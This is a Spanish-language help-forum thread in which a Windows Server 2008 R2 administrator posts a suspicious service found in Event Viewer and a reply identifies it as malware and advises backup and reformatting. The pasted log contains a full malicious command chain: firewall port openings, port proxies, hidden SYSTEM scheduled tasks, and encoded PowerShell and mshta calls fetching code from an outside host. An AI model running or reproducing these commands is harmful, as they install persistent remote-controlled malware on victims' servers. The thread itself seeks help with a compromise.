VIRUS/MALWARE? ttt.exe y otros (Windows Server)

Buenas tardes me podran orientar en varios momentos al dia, me solicita reiniciar el servidor encontre en el visor de eventos lo siguiente que me llamo la atencion

WINDOWS SERVER 2008R2

Se instaló un servicio en el sistema.

Nombre del servicio:  yMVk
Nombre del archivo del servicio:  cmd /c c:\installed.exe&c:\installed.exe&echo c:\installed.exe >c:/windows/temp/p.bat&echo c:\windows\temp\svchost.exe >>c:/windows/temp/p.bat&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"^&schtasks /run /TN Autocheck^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo net user k8h3d /del >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat
Tipo de servicio:  servicio de modo usuario
Tipo de inicio de servicio:  inicio automático
Cuenta de servicio:  LocalSystem

Hola @alexnl y bienvenido al foro.

Te dejo algunos temas de interés y utilidad:

Según lo que pones a menos que hayas creado tu dicho servicio es una infección.

Debido a que la mayoría de las herramientas que se usan para desinfecciones no son compatibles con ninguna versión de windows server yo recomendaría respaldar y formatear si no se cuenta con acceso o soporte.

Esto ya que tanto este foro como las herramientas (de otros foros o alguna empresa) suelen proporcionarse como ayuda gratuita a usuarios domesticos; windows server es usado en servidores que suelen ser de empresas. Sin el uso de estas herramientas sería cuestión de usar un producto de paga o basarse en el uso de CMD para eliminar el malware, el servicio y cualquier cosa adicional. Esto ultimo siendo algo complicado.

Saludos

1 me gusta